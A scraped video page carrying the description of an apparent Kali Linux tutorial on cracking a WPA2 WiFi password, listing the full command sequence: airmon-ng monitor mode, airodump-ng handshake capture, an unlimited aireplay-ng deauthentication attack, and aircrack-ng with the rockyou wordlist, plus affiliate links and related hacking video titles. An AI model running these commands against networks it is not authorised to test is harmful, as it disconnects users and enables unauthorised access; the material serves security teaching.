♫musicjinni

Cracking WiFi WPA2 Handshake

video thumbnail
Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video.

Menu:
Use airmon-ng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmon-ng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodump-ng: 5:15
Use airodump-ng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodump-ng capture WPA2 four way handshake: 6:58
Use aireplay-ng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrack-ng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40

================
Network Adapters:
================
Alfa AWUS036NHA: https://amzn.to/3qbQGKN
Alfa AWUSO36NH: https://amzn.to/3moeQiI

================
Commands used:
================
! See version of Kali
cat /etc/os-release
uname -a

! See interfaces
ip addr
iwconfig

!kill processes
sudo airmon-ng check kill

!Start monitor mode
sudo airmon-ng start wlan0

!Verify that monitor mode is used
sudo airmon-ng

!You could also use iwconfig to check that interface is in monitor mode:
iwconfig

! Get the AP's MAC address and channel
sudo airodump-ng wlan0mon

! AP-MAC & channel - you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2

!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon

!2nd Window - deauth attack
!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon

!Use Wireshark to open hack file
wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol

!Stop monitor mode
airmon-ng stop wlan0mon

!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt

================
Previous videos:
================
Kali Installation: https://youtu.be/VAMP8DqSDjg
WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M
Wordlists (rockyou): https://youtu.be/rgWcguAg-XA

================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal

================
Support me:
================
Buy my CCNA course and support me:
DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna
Udemy CCNA Course: https://bit.ly/ccnafor10dollars
GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10

======================
Special Offers:
======================
Boson software: 15% discount
Link: bit.ly/boson15
Code: DBAF15P

wifi
kali linux
kali linux 2020
kali linux 2020.4
wifite
wpa
wep
wps
alfa
comptia
ceh
oscp
wifi
airmon-ng
aircrack-ng
hack
hacker
hacking
ethical hacking
kali
ine

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

#wifi #wpa2 #kalilinux

Cracking WiFi WPA2 Handshake

I will own your WiFi with one Kali Linux command

🔥 Kali Nethunter wifi hacking 🔥 #technical_krrish #trending #viral #nethunter #root

It's too easy to own a WiFi network

Brute force WiFi WPA2

Wireless Access with Bettercap on Kali Linux (Cybersecurity)

wifite kali linux | hashcat wifi cracking kali linux | Class 04

Ethisches Hacken #1 - WLan hacken - WPA/WPA2 über Handshake - Bruteforce

Hacking Wi-Fi in Seconds with Airgeddon & Parrot Security OS [Tutorial]

WIFI Hacking with aircrack-ng Full Course Remastered for penetration testers

Kali Linux 2 0 Crack WPA & WPA2 WiFi Password Wifite

How to Unzip and Use Rockyou Wordlist in Kali Linux Rolling

Aircrack-ng Tutorial | WiFi pentesting in a Manual way

Linux Networking that you need to know (Episode 3)

Cracking WiFi WPA2 Handshake

Wi-Fi Networking 💀: Penetration and Security of Wireless Networks - Full Tutorial

How to hack WiFi using Kali Linux in 2024 | in hindi || #hacker #kalilinux

Kali Linux 2017 Wireless Penetration Testing for Beginners: The Course Overview| packtpub.com

Kali Linux 2017 Wireless Penetration Testing for Beginners: Setting up Our Lab| packtpub.com

White Hat 2019: 6.8 l Cracking WPA & WPA2 Encryption (Using Wifite)

OMG😱!! Hacker ne meri or meri friend ki I'd hack kali🥺😭#shots

WiFi Pentesting Using Aircrack-ng | [Hindi] | Cyber Academy

hacking wifi wihtout password connection

How to Hack wifi without password||wifi kaise hack karin.#shorts #youtubeshorts #wifihack #wifi

Your WiFi is mine! (hak5 omg cable)

White Hat 2019: 6.10 l Cracking WPA & WPA2 Encryption (Capturing Handshake) - Practical

Cr@cking WIFI WPA2 Handshake

Wi-Fi Password Ek Click Par Pata Chalega #shorts #SHORTS #XSS #freefire #freefiremax

১ ক্লিকে মোবাইলে দিয়ে Wifi পাসওয়ার্ড হ্যাক করুন । How to Hack WiFi Password #wifipassword

Aula 9 - Como ativar o MODO MONITOR do TL-722N⁄V2 no KALI LINUX E PARROT OS | SEGURANÇA OFENSIVA

Disclaimer DMCA